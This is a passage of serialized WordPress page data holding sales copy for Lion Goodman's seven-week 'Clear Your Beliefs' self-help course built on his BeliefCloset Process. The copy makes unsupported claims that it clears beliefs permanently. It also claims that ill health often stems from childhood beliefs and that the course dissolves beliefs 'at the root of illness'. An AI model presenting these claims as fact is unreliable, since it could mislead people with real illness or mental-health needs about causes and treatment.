success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60520:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really 